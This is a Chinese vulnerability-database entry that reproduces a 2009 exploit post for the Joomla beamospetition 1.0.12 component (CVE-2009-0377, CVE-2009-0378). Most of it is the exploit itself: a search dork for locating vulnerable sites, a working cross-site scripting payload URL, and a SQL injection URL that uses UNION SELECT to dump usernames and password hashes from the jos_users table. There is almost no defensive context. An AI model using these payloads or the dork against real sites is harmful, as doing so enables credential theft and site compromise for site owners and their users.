Joomla component beamospetition 1.0.12 Sql Injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1052279 漏洞类型
发布时间 2009-01-22 更新时间 2009-01-22
CVE编号 CVE-2009-0377
CVE-2009-0378
CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2009010055
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
 Joomla component beamospetition 1.0.12 Sql Injection / Xss
Author : vds_s
Dork : "Powered by beamospetition 1.0.12"
Dl : http://joomlacode.org/gf/project/beamospetition/
Xss : http://[site]/?option=com_beamospetition&func=sign&pet='><script>alert('Xss')</script>
Sql Injection : http://[site]/?option=com_beamospetition&func=sign&mpid=-9999'%20union%20select%200,1,username,password,4,5,6,7,8,9,10,11,12,13,14,15%20from%20jos_users/*